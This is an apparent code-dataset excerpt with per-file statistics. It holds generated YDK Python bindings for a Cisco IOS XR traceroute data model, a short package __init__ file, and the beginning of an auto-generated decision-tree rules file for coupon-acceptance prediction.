self._perform_setattr(Traceroute.Output.TracerouteResponse.Ipv4.Hops, [], name, value)
class Hop(Entity):
"""
.. attribute:: hop_index (key)
Index of the hop
**type**\: int
**range:** 0..4294967295
.. attribute:: hop_address
Address of the hop
**type**\: str
.. attribute:: hop_hostname
Hostname of the hop
**type**\: str
.. attribute:: probes
**type**\: :py:class:`Probes <ydk.models.cisco_ios_xr.Cisco_IOS_XR_traceroute_act.Traceroute.Output.TracerouteResponse.Ipv4.Hops.Hop.Probes>`
"""
_prefix = 'traceroute-act'
_revision = '2016-09-28'
def __init__(self):
super(Traceroute.Output.TracerouteResponse.Ipv4.Hops.Hop, self).__init__()
self.yang_name = "hop"
self.yang_parent_name = "hops"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = ['hop_index']
self._child_classes = OrderedDict([("probes", ("probes", Traceroute.Output.TracerouteResponse.Ipv4.Hops.Hop.Probes))])
self._leafs = OrderedDict([
('hop_index', (YLeaf(YType.uint32, 'hop-index'), ['int'])),
('hop_address', (YLeaf(YType.str, 'hop-address'), ['str'])),
('hop_hostname', (YLeaf(YType.str, 'hop-hostname'), ['str'])),
])
self.hop_index = None
self.hop_address = None
self.hop_hostname = None
self.probes = Traceroute.Output.TracerouteResponse.Ipv4.Hops.Hop.Probes()
self.probes.parent = self
self._children_name_map["probes"] = "probes"
self._segment_path = lambda: "hop" + "[hop-index='" + str(self.hop_index) + "']"
self._absolute_path = lambda: "Cisco-IOS-XR-traceroute-act:traceroute/output/traceroute-response/ipv4/hops/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Traceroute.Output.TracerouteResponse.Ipv4.Hops.Hop, [u'hop_index', u'hop_address', u'hop_hostname'], name, value)
class Probes(Entity):
"""
.. attribute:: probe
**type**\: list of :py:class:`Probe <ydk.models.cisco_ios_xr.Cisco_IOS_XR_traceroute_act.Traceroute.Output.TracerouteResponse.Ipv4.Hops.Hop.Probes.Probe>`
"""
_prefix = 'traceroute-act'
_revision = '2016-09-28'
def __init__(self):
super(Traceroute.Output.TracerouteResponse.Ipv4.Hops.Hop.Probes, self).__init__()
self.yang_name = "probes"
self.yang_parent_name = "hop"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("probe", ("probe", Traceroute.Output.TracerouteResponse.Ipv4.Hops.Hop.Probes.Probe))])
self._leafs = OrderedDict()
self.probe = YList(self)
self._segment_path = lambda: "probes"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Traceroute.Output.TracerouteResponse.Ipv4.Hops.Hop.Probes, [], name, value)
class Probe(Entity):
"""
.. attribute:: probe_index (key)
Index of the probe
**type**\: int
**range:** 0..4294967295
.. attribute:: result
Response for each probe
**type**\: str
.. attribute:: delta_time
Delta time in seconds
**type**\: int
**range:** 0..4294967295
.. attribute:: hop_address
Address of the hop
**type**\: str
.. attribute:: hop_hostname
Hostname of the hop
**type**\: str
"""
_prefix = 'traceroute-act'
_revision = '2016-09-28'
def __init__(self):
super(Traceroute.Output.TracerouteResponse.Ipv4.Hops.Hop.Probes.Probe, self).__init__()
self.yang_name = "probe"
self.yang_parent_name = "probes"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['probe_index']
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('probe_index', (YLeaf(YType.uint32, 'probe-index'), ['int'])),
('result', (YLeaf(YType.str, 'result'), ['str'])),
('delta_time', (YLeaf(YType.uint32, 'delta-time'), ['int'])),
('hop_address', (YLeaf(YType.str, 'hop-address'), ['str'])),
('hop_hostname', (YLeaf(YType.str, 'hop-hostname'), ['str'])),
])
self.probe_index = None
self.result = None
self.delta_time = None
self.hop_address = None
self.hop_hostname = None
self._segment_path = lambda: "probe" + "[probe-index='" + str(self.probe_index) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Traceroute.Output.TracerouteResponse.Ipv4.Hops.Hop.Probes.Probe, [u'probe_index', u'result', u'delta_time', u'hop_address', u'hop_hostname'], name, value)
class Ipv6(Entity):
"""
.. attribute:: destination
Destination address or hostname
**type**\: str
.. attribute:: hops
**type**\: :py:class:`Hops <ydk.models.cisco_ios_xr.Cisco_IOS_XR_traceroute_act.Traceroute.Output.TracerouteResponse.Ipv6.Hops>`
.. attribute:: verbose_output
Verbose output
**type**\: str
"""
_prefix = 'traceroute-act'
_revision = '2016-09-28'
def __init__(self):
super(Traceroute.Output.TracerouteResponse.Ipv6, self).__init__()
self.yang_name = "ipv6"
self.yang_parent_name = "traceroute-response"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("hops", ("hops", Traceroute.Output.TracerouteResponse.Ipv6.Hops))])
self._leafs = OrderedDict([
('destination', (YLeaf(YType.str, 'destination'), ['str'])),
('verbose_output', (YLeaf(YType.str, 'verbose-output'), ['str'])),
])
self.destination = None
self.verbose_output = None
self.hops = Traceroute.Output.TracerouteResponse.Ipv6.Hops()
self.hops.parent = self
self._children_name_map["hops"] = "hops"
self._segment_path = lambda: "ipv6"
self._absolute_path = lambda: "Cisco-IOS-XR-traceroute-act:traceroute/output/traceroute-response/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Traceroute.Output.TracerouteResponse.Ipv6, [u'destination', u'verbose_output'], name, value)
class Hops(Entity):
"""
.. attribute:: hop
**type**\: list of :py:class:`Hop <ydk.models.cisco_ios_xr.Cisco_IOS_XR_traceroute_act.Traceroute.Output.TracerouteResponse.Ipv6.Hops.Hop>`
"""
_prefix = 'traceroute-act'
_revision = '2016-09-28'
def __init__(self):
super(Traceroute.Output.TracerouteResponse.Ipv6.Hops, self).__init__()
self.yang_name = "hops"
self.yang_parent_name = "ipv6"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("hop", ("hop", Traceroute.Output.TracerouteResponse.Ipv6.Hops.Hop))])
self._leafs = OrderedDict()
self.hop = YList(self)
self._segment_path = lambda: "hops"
self._absolute_path = lambda: "Cisco-IOS-XR-traceroute-act:traceroute/output/traceroute-response/ipv6/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Traceroute.Output.TracerouteResponse.Ipv6.Hops, [], name, value)
class Hop(Entity):
"""
.. attribute:: hop_index (key)
Index of the hop
**type**\: int
**range:** 0..4294967295
.. attribute:: hop_address
Address of the hop
**type**\: str
.. attribute:: hop_hostname
Hostname of the hop
**type**\: str
.. attribute:: probes
**type**\: :py:class:`Probes <ydk.models.cisco_ios_xr.Cisco_IOS_XR_traceroute_act.Traceroute.Output.TracerouteResponse.Ipv6.Hops.Hop.Probes>`
"""
_prefix = 'traceroute-act'
_revision = '2016-09-28'
def __init__(self):
super(Traceroute.Output.TracerouteResponse.Ipv6.Hops.Hop, self).__init__()
self.yang_name = "hop"
self.yang_parent_name = "hops"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = ['hop_index']
self._child_classes = OrderedDict([("probes", ("probes", Traceroute.Output.TracerouteResponse.Ipv6.Hops.Hop.Probes))])
self._leafs = OrderedDict([
('hop_index', (YLeaf(YType.uint32, 'hop-index'), ['int'])),
('hop_address', (YLeaf(YType.str, 'hop-address'), ['str'])),
('hop_hostname', (YLeaf(YType.str, 'hop-hostname'), ['str'])),
])
self.hop_index = None
self.hop_address = None
self.hop_hostname = None
self.probes = Traceroute.Output.TracerouteResponse.Ipv6.Hops.Hop.Probes()
self.probes.parent = self
self._children_name_map["probes"] = "probes"
self._segment_path = lambda: "hop" + "[hop-index='" + str(self.hop_index) + "']"
self._absolute_path = lambda: "Cisco-IOS-XR-traceroute-act:traceroute/output/traceroute-response/ipv6/hops/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Traceroute.Output.TracerouteResponse.Ipv6.Hops.Hop, [u'hop_index', u'hop_address', u'hop_hostname'], name, value)
class Probes(Entity):
"""
.. attribute:: probe
**type**\: list of :py:class:`Probe <ydk.models.cisco_ios_xr.Cisco_IOS_XR_traceroute_act.Traceroute.Output.TracerouteResponse.Ipv6.Hops.Hop.Probes.Probe>`
"""
_prefix = 'traceroute-act'
_revision = '2016-09-28'
def __init__(self):
super(Traceroute.Output.TracerouteResponse.Ipv6.Hops.Hop.Probes, self).__init__()
self.yang_name = "probes"
self.yang_parent_name = "hop"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("probe", ("probe", Traceroute.Output.TracerouteResponse.Ipv6.Hops.Hop.Probes.Probe))])
self._leafs = OrderedDict()
self.probe = YList(self)
self._segment_path = lambda: "probes"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Traceroute.Output.TracerouteResponse.Ipv6.Hops.Hop.Probes, [], name, value)
class Probe(Entity):
"""
.. attribute:: probe_index (key)
Index of the probe
**type**\: int
**range:** 0..4294967295
.. attribute:: result
Response for each probe
**type**\: str
.. attribute:: delta_time
Delta time in seconds
**type**\: int
**range:** 0..4294967295
.. attribute:: hop_address
Address of the hop
**type**\: str
.. attribute:: hop_hostname
Hostname of the hop
**type**\: str
"""
_prefix = 'traceroute-act'
_revision = '2016-09-28'
def __init__(self):
super(Traceroute.Output.TracerouteResponse.Ipv6.Hops.Hop.Probes.Probe, self).__init__()
self.yang_name = "probe"
self.yang_parent_name = "probes"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['probe_index']
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('probe_index', (YLeaf(YType.uint32, 'probe-index'), ['int'])),
('result', (YLeaf(YType.str, 'result'), ['str'])),
('delta_time', (YLeaf(YType.uint32, 'delta-time'), ['int'])),
('hop_address', (YLeaf(YType.str, 'hop-address'), ['str'])),
('hop_hostname', (YLeaf(YType.str, 'hop-hostname'), ['str'])),
])
self.probe_index = None
self.result = None
self.delta_time = None
self.hop_address = None
self.hop_hostname = None
self._segment_path = lambda: "probe" + "[probe-index='" + str(self.probe_index) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Traceroute.Output.TracerouteResponse.Ipv6.Hops.Hop.Probes.Probe, [u'probe_index', u'result', u'delta_time', u'hop_address', u'hop_hostname'], name, value)
def clone_ptr(self):
self._top_entity = Traceroute()
return self._top_entity
| 39.966606
| 235
| 0.427907
| 3,508
| 44,283
| 5.152794
| 0.047605
| 0.054879
| 0.095928
| 0.0343
| 0.923434
| 0.907004
| 0.890518
| 0.88919
| 0.886811
| 0.885484
| 0
| 0.018681
| 0.466906
| 44,283
| 1,107
| 236
| 40.00271
| 0.747024
| 0.179685
| 0
| 0.78125
| 0
| 0.008929
| 0.121795
| 0.026965
| 0
| 0
| 0
| 0
| 0
| 1
| 0.075893
| false
| 0
| 0.011161
| 0
| 0.131696
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7d7aeca3909a080d92affaa8fafc5c6564b034b0
| 204
|
py
|
Python
|
evaluation_framework/EntityRelatedness/__init__.py
|
nheist/Evaluation-Framework
|
0561fcbca5025f280624c02f6fad24a888c653ab
|
[
"Apache-2.0"
] | 2
|
2020-08-01T07:12:00.000Z
|
2022-02-10T10:19:11.000Z
|
evaluation_framework/EntityRelatedness/__init__.py
|
nheist/Evaluation-Framework
|
0561fcbca5025f280624c02f6fad24a888c653ab
|
[
"Apache-2.0"
] | null | null | null |
evaluation_framework/EntityRelatedness/__init__.py
|
nheist/Evaluation-Framework
|
0561fcbca5025f280624c02f6fad24a888c653ab
|
[
"Apache-2.0"
] | null | null | null |
from evaluation_framework.EntityRelatedness.entityRelatedness_model import EntityRelatednessModel
from evaluation_framework.EntityRelatedness.entityRelatedness_taskManager import EntityRelatednessManager
| 68
| 105
| 0.941176
| 16
| 204
| 11.75
| 0.5625
| 0.148936
| 0.244681
| 0.425532
| 0.606383
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.039216
| 204
| 2
| 106
| 102
| 0.959184
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 1
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 9
|
7dc06d3f6b15f5990790bf4048cdb9403eddb0e5
| 315,260
|
py
|
Python
|
duke-cs671-fall21-coupon-recommendation/outputs/rules/ID3/13_features/maxdepth_5/4/rules.py
|
apcarrik/kaggle
|
6e2d4db58017323e7ba5510bcc2598e01a4ee7bf
|
[
"MIT"
] | null | null | null |
duke-cs671-fall21-coupon-recommendation/outputs/rules/ID3/13_features/maxdepth_5/4/rules.py
|
apcarrik/kaggle
|
6e2d4db58017323e7ba5510bcc2598e01a4ee7bf
|
[
"MIT"
] | null | null | null |
duke-cs671-fall21-coupon-recommendation/outputs/rules/ID3/13_features/maxdepth_5/4/rules.py
|
apcarrik/kaggle
|
6e2d4db58017323e7ba5510bcc2598e01a4ee7bf
|
[
"MIT"
] | null | null | null |
def findDecision(obj): #obj[0]: Passanger, obj[1]: Time, obj[2]: Coupon, obj[3]: Gender, obj[4]: Age, obj[5]: Children, obj[6]: Education, obj[7]: Occupation, obj[8]: Bar, obj[9]: Coffeehouse, obj[10]: Restaurant20to50, obj[11]: Direction_same, obj[12]: Distance
# {"feature": "Coupon", "instances": 8148, "metric_value": 0.4751, "depth": 1}
if obj[2]>1:
# {"feature": "Coffeehouse", "instances": 5867, "metric_value": 0.461, "depth": 2}
if obj[9]>0.0:
# {"feature": "Distance", "instances": 4415, "metric_value": 0.44, "depth": 3}
if obj[12]<=2:
# {"feature": "Passanger", "instances": 3980, "metric_value": 0.4296, "depth": 4}
if obj[0]<=2:
# {"feature": "Gender", "instances": 2590, "metric_value": 0.4529, "depth": 5}
if obj[3]>0:
# {"feature": "Occupation", "instances": 1404, "metric_value": 0.4705, "depth": 6}
if obj[7]>1.5272800515844427:
# {"feature": "Time", "instances": 1149, "metric_value": 0.4764, "depth": 7}
if obj[1]<=3:
# {"feature": "Children", "instances": 937, "metric_value": 0.482, "depth": 8}
if obj[5]<=0:
# {"feature": "Restaurant20to50", "instances": 490, "metric_value": 0.4898, "depth": 9}
if obj[10]>0.0:
# {"feature": "Bar", "instances": 418, "metric_value": 0.4829, "depth": 10}
if obj[8]>0.0:
# {"feature": "Education", "instances": 309, "metric_value": 0.4772, "depth": 11}
if obj[6]<=2:
# {"feature": "Age", "instances": 232, "metric_value": 0.4783, "depth": 12}
if obj[4]<=4:
# {"feature": "Direction_same", "instances": 210, "metric_value": 0.4861, "depth": 13}
if obj[11]<=0:
return 'True'
elif obj[11]>0:
return 'True'
else: return 'True'
elif obj[4]>4:
# {"feature": "Direction_same", "instances": 22, "metric_value": 0.3955, "depth": 13}
if obj[11]<=0:
return 'True'
elif obj[11]>0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[6]>2:
# {"feature": "Direction_same", "instances": 77, "metric_value": 0.4596, "depth": 12}
if obj[11]<=0:
# {"feature": "Age", "instances": 40, "metric_value": 0.3947, "depth": 13}
if obj[4]<=1:
return 'False'
elif obj[4]>1:
return 'False'
else: return 'False'
elif obj[11]>0:
# {"feature": "Age", "instances": 37, "metric_value": 0.456, "depth": 13}
if obj[4]<=1:
return 'False'
elif obj[4]>1:
return 'True'
else: return 'True'
else: return 'False'
else: return 'False'
elif obj[8]<=0.0:
# {"feature": "Education", "instances": 109, "metric_value": 0.4152, "depth": 11}
if obj[6]<=3:
# {"feature": "Age", "instances": 92, "metric_value": 0.4548, "depth": 12}
if obj[4]<=5:
# {"feature": "Direction_same", "instances": 87, "metric_value": 0.4807, "depth": 13}
if obj[11]<=0:
return 'True'
elif obj[11]>0:
return 'True'
else: return 'True'
elif obj[4]>5:
return 'True'
else: return 'True'
elif obj[6]>3:
# {"feature": "Direction_same", "instances": 17, "metric_value": 0.1008, "depth": 12}
if obj[11]<=0:
return 'True'
elif obj[11]>0:
# {"feature": "Age", "instances": 7, "metric_value": 0.2286, "depth": 13}
if obj[4]>0:
return 'True'
elif obj[4]<=0:
return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
elif obj[10]<=0.0:
# {"feature": "Bar", "instances": 72, "metric_value": 0.4709, "depth": 10}
if obj[8]<=0.0:
# {"feature": "Direction_same", "instances": 43, "metric_value": 0.4921, "depth": 11}
if obj[11]<=0:
# {"feature": "Education", "instances": 26, "metric_value": 0.4872, "depth": 12}
if obj[6]>0:
# {"feature": "Age", "instances": 20, "metric_value": 0.5, "depth": 13}
if obj[4]<=1:
return 'True'
elif obj[4]>1:
return 'False'
else: return 'False'
elif obj[6]<=0:
# {"feature": "Age", "instances": 6, "metric_value": 0.4444, "depth": 13}
if obj[4]<=4:
return 'False'
else: return 'False'
else: return 'False'
elif obj[11]>0:
# {"feature": "Age", "instances": 17, "metric_value": 0.4412, "depth": 12}
if obj[4]<=4:
# {"feature": "Education", "instances": 16, "metric_value": 0.4667, "depth": 13}
if obj[6]<=0:
return 'True'
elif obj[6]>0:
return 'True'
else: return 'True'
elif obj[4]>4:
return 'False'
else: return 'False'
else: return 'True'
elif obj[8]>0.0:
# {"feature": "Education", "instances": 29, "metric_value": 0.4007, "depth": 11}
if obj[6]>0:
# {"feature": "Direction_same", "instances": 21, "metric_value": 0.3152, "depth": 12}
if obj[11]>0:
# {"feature": "Age", "instances": 11, "metric_value": 0.1591, "depth": 13}
if obj[4]<=1:
return 'False'
elif obj[4]>1:
return 'False'
else: return 'False'
elif obj[11]<=0:
# {"feature": "Age", "instances": 10, "metric_value": 0.4762, "depth": 13}
if obj[4]>1:
return 'False'
elif obj[4]<=1:
return 'False'
else: return 'False'
else: return 'False'
elif obj[6]<=0:
# {"feature": "Age", "instances": 8, "metric_value": 0.5, "depth": 12}
if obj[4]<=4:
# {"feature": "Direction_same", "instances": 8, "metric_value": 0.5, "depth": 13}
if obj[11]>0:
return 'False'
elif obj[11]<=0:
return 'False'
else: return 'False'
else: return 'False'
else: return 'False'
else: return 'False'
else: return 'False'
elif obj[5]>0:
# {"feature": "Age", "instances": 447, "metric_value": 0.4651, "depth": 9}
if obj[4]>2:
# {"feature": "Bar", "instances": 245, "metric_value": 0.4734, "depth": 10}
if obj[8]>0.0:
# {"feature": "Restaurant20to50", "instances": 136, "metric_value": 0.4443, "depth": 11}
if obj[10]<=1.0:
# {"feature": "Education", "instances": 98, "metric_value": 0.415, "depth": 12}
if obj[6]>0:
# {"feature": "Direction_same", "instances": 63, "metric_value": 0.3764, "depth": 13}
if obj[11]<=0:
return 'True'
elif obj[11]>0:
return 'True'
else: return 'True'
elif obj[6]<=0:
# {"feature": "Direction_same", "instances": 35, "metric_value": 0.4796, "depth": 13}
if obj[11]<=0:
return 'True'
elif obj[11]>0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[10]>1.0:
# {"feature": "Education", "instances": 38, "metric_value": 0.485, "depth": 12}
if obj[6]<=2:
# {"feature": "Direction_same", "instances": 24, "metric_value": 0.5, "depth": 13}
if obj[11]<=0:
return 'True'
elif obj[11]>0:
return 'False'
else: return 'False'
elif obj[6]>2:
# {"feature": "Direction_same", "instances": 14, "metric_value": 0.3937, "depth": 13}
if obj[11]<=0:
return 'True'
elif obj[11]>0:
return 'False'
else: return 'False'
else: return 'True'
else: return 'True'
elif obj[8]<=0.0:
# {"feature": "Education", "instances": 109, "metric_value": 0.442, "depth": 11}
if obj[6]<=2:
# {"feature": "Restaurant20to50", "instances": 95, "metric_value": 0.4642, "depth": 12}
if obj[10]<=1.0:
# {"feature": "Direction_same", "instances": 52, "metric_value": 0.4968, "depth": 13}
if obj[11]<=0:
return 'False'
elif obj[11]>0:
return 'True'
else: return 'True'
elif obj[10]>1.0:
# {"feature": "Direction_same", "instances": 43, "metric_value": 0.4208, "depth": 13}
if obj[11]<=0:
return 'True'
elif obj[11]>0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[6]>2:
# {"feature": "Direction_same", "instances": 14, "metric_value": 0.127, "depth": 12}
if obj[11]<=0:
# {"feature": "Restaurant20to50", "instances": 9, "metric_value": 0.1975, "depth": 13}
if obj[10]<=2.0:
return 'False'
else: return 'False'
elif obj[11]>0:
return 'False'
else: return 'False'
else: return 'False'
else: return 'True'
elif obj[4]<=2:
# {"feature": "Direction_same", "instances": 202, "metric_value": 0.4356, "depth": 10}
if obj[11]<=0:
# {"feature": "Education", "instances": 117, "metric_value": 0.4614, "depth": 11}
if obj[6]<=2:
# {"feature": "Restaurant20to50", "instances": 95, "metric_value": 0.4455, "depth": 12}
if obj[10]>0.0:
# {"feature": "Bar", "instances": 92, "metric_value": 0.4573, "depth": 13}
if obj[8]<=2.0:
return 'True'
elif obj[8]>2.0:
return 'False'
else: return 'False'
elif obj[10]<=0.0:
return 'True'
else: return 'True'
elif obj[6]>2:
# {"feature": "Restaurant20to50", "instances": 22, "metric_value": 0.4675, "depth": 12}
if obj[10]>0.0:
# {"feature": "Bar", "instances": 21, "metric_value": 0.4762, "depth": 13}
if obj[8]>0.0:
return 'False'
elif obj[8]<=0.0:
return 'False'
else: return 'False'
elif obj[10]<=0.0:
return 'True'
else: return 'True'
else: return 'False'
elif obj[11]>0:
# {"feature": "Bar", "instances": 85, "metric_value": 0.373, "depth": 11}
if obj[8]>0.0:
# {"feature": "Restaurant20to50", "instances": 46, "metric_value": 0.4193, "depth": 12}
if obj[10]>0.0:
# {"feature": "Education", "instances": 42, "metric_value": 0.4223, "depth": 13}
if obj[6]<=2:
return 'True'
elif obj[6]>2:
return 'False'
else: return 'False'
elif obj[10]<=0.0:
return 'True'
else: return 'True'
elif obj[8]<=0.0:
# {"feature": "Restaurant20to50", "instances": 39, "metric_value": 0.2591, "depth": 12}
if obj[10]<=2.0:
# {"feature": "Education", "instances": 38, "metric_value": 0.2314, "depth": 13}
if obj[6]>0:
return 'True'
elif obj[6]<=0:
return 'True'
else: return 'True'
elif obj[10]>2.0:
return 'False'
else: return 'False'
else: return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
elif obj[1]>3:
# {"feature": "Age", "instances": 212, "metric_value": 0.4272, "depth": 8}
if obj[4]<=3:
# {"feature": "Education", "instances": 139, "metric_value": 0.4453, "depth": 9}
if obj[6]>0:
# {"feature": "Bar", "instances": 96, "metric_value": 0.4837, "depth": 10}
if obj[8]<=2.0:
# {"feature": "Restaurant20to50", "instances": 91, "metric_value": 0.4888, "depth": 11}
if obj[10]<=1.0:
# {"feature": "Children", "instances": 57, "metric_value": 0.4953, "depth": 12}
if obj[5]>0:
# {"feature": "Direction_same", "instances": 32, "metric_value": 0.4922, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
elif obj[5]<=0:
# {"feature": "Direction_same", "instances": 25, "metric_value": 0.4992, "depth": 13}
if obj[11]<=0:
return 'False'
else: return 'False'
else: return 'False'
elif obj[10]>1.0:
# {"feature": "Children", "instances": 34, "metric_value": 0.4714, "depth": 12}
if obj[5]>0:
# {"feature": "Direction_same", "instances": 20, "metric_value": 0.48, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
elif obj[5]<=0:
# {"feature": "Direction_same", "instances": 14, "metric_value": 0.4592, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
elif obj[8]>2.0:
# {"feature": "Restaurant20to50", "instances": 5, "metric_value": 0.2, "depth": 11}
if obj[10]<=2.0:
return 'False'
elif obj[10]>2.0:
# {"feature": "Children", "instances": 2, "metric_value": 0.0, "depth": 12}
if obj[5]<=0:
return 'False'
elif obj[5]>0:
return 'True'
else: return 'True'
else: return 'False'
else: return 'False'
elif obj[6]<=0:
# {"feature": "Restaurant20to50", "instances": 43, "metric_value": 0.32, "depth": 10}
if obj[10]<=1.0:
# {"feature": "Bar", "instances": 26, "metric_value": 0.3671, "depth": 11}
if obj[8]<=1.0:
# {"feature": "Children", "instances": 22, "metric_value": 0.4227, "depth": 12}
if obj[5]<=0:
# {"feature": "Direction_same", "instances": 12, "metric_value": 0.375, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
elif obj[5]>0:
# {"feature": "Direction_same", "instances": 10, "metric_value": 0.48, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[8]>1.0:
return 'True'
else: return 'True'
elif obj[10]>1.0:
# {"feature": "Bar", "instances": 17, "metric_value": 0.1968, "depth": 11}
if obj[8]<=1.0:
# {"feature": "Children", "instances": 13, "metric_value": 0.1282, "depth": 12}
if obj[5]<=0:
return 'True'
elif obj[5]>0:
# {"feature": "Direction_same", "instances": 6, "metric_value": 0.2778, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[8]>1.0:
# {"feature": "Children", "instances": 4, "metric_value": 0.3333, "depth": 12}
if obj[5]<=0:
# {"feature": "Direction_same", "instances": 3, "metric_value": 0.4444, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
elif obj[5]>0:
return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
elif obj[4]>3:
# {"feature": "Education", "instances": 73, "metric_value": 0.3305, "depth": 9}
if obj[6]<=3:
# {"feature": "Restaurant20to50", "instances": 65, "metric_value": 0.3632, "depth": 10}
if obj[10]<=2.0:
# {"feature": "Bar", "instances": 61, "metric_value": 0.3798, "depth": 11}
if obj[8]<=2.0:
# {"feature": "Children", "instances": 54, "metric_value": 0.3649, "depth": 12}
if obj[5]>0:
# {"feature": "Direction_same", "instances": 27, "metric_value": 0.3841, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
elif obj[5]<=0:
# {"feature": "Direction_same", "instances": 27, "metric_value": 0.3457, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[8]>2.0:
# {"feature": "Children", "instances": 7, "metric_value": 0.2286, "depth": 12}
if obj[5]<=0:
# {"feature": "Direction_same", "instances": 5, "metric_value": 0.32, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
elif obj[5]>0:
return 'False'
else: return 'False'
else: return 'True'
elif obj[10]>2.0:
return 'True'
else: return 'True'
elif obj[6]>3:
return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
elif obj[7]<=1.5272800515844427:
# {"feature": "Time", "instances": 255, "metric_value": 0.4244, "depth": 7}
if obj[1]>0:
# {"feature": "Education", "instances": 180, "metric_value": 0.4477, "depth": 8}
if obj[6]<=2:
# {"feature": "Restaurant20to50", "instances": 151, "metric_value": 0.4706, "depth": 9}
if obj[10]<=2.0:
# {"feature": "Bar", "instances": 133, "metric_value": 0.476, "depth": 10}
if obj[8]<=0.0:
# {"feature": "Age", "instances": 76, "metric_value": 0.4149, "depth": 11}
if obj[4]>2:
# {"feature": "Children", "instances": 41, "metric_value": 0.3346, "depth": 12}
if obj[5]>0:
# {"feature": "Direction_same", "instances": 39, "metric_value": 0.3201, "depth": 13}
if obj[11]<=0:
return 'True'
elif obj[11]>0:
return 'True'
else: return 'True'
elif obj[5]<=0:
# {"feature": "Direction_same", "instances": 2, "metric_value": 0.5, "depth": 13}
if obj[11]<=0:
return 'False'
else: return 'False'
else: return 'False'
elif obj[4]<=2:
# {"feature": "Direction_same", "instances": 35, "metric_value": 0.4515, "depth": 12}
if obj[11]<=0:
# {"feature": "Children", "instances": 26, "metric_value": 0.4727, "depth": 13}
if obj[5]>0:
return 'True'
elif obj[5]<=0:
return 'False'
else: return 'False'
elif obj[11]>0:
# {"feature": "Children", "instances": 9, "metric_value": 0.3016, "depth": 13}
if obj[5]>0:
return 'False'
elif obj[5]<=0:
return 'False'
else: return 'False'
else: return 'False'
else: return 'False'
elif obj[8]>0.0:
# {"feature": "Direction_same", "instances": 57, "metric_value": 0.4698, "depth": 11}
if obj[11]<=0:
# {"feature": "Children", "instances": 41, "metric_value": 0.4345, "depth": 12}
if obj[5]<=0:
# {"feature": "Age", "instances": 29, "metric_value": 0.4939, "depth": 13}
if obj[4]>1:
return 'False'
elif obj[4]<=1:
return 'True'
else: return 'True'
elif obj[5]>0:
# {"feature": "Age", "instances": 12, "metric_value": 0.2, "depth": 13}
if obj[4]>1:
return 'False'
elif obj[4]<=1:
return 'False'
else: return 'False'
else: return 'False'
elif obj[11]>0:
# {"feature": "Age", "instances": 16, "metric_value": 0.4087, "depth": 12}
if obj[4]<=3:
# {"feature": "Children", "instances": 9, "metric_value": 0.3444, "depth": 13}
if obj[5]<=0:
return 'True'
elif obj[5]>0:
return 'True'
else: return 'True'
elif obj[4]>3:
# {"feature": "Children", "instances": 7, "metric_value": 0.4286, "depth": 13}
if obj[5]<=0:
return 'True'
elif obj[5]>0:
return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
else: return 'False'
elif obj[10]>2.0:
# {"feature": "Age", "instances": 18, "metric_value": 0.3214, "depth": 10}
if obj[4]<=4:
# {"feature": "Children", "instances": 13, "metric_value": 0.2051, "depth": 11}
if obj[5]<=0:
return 'True'
elif obj[5]>0:
# {"feature": "Direction_same", "instances": 6, "metric_value": 0.3333, "depth": 12}
if obj[11]>0:
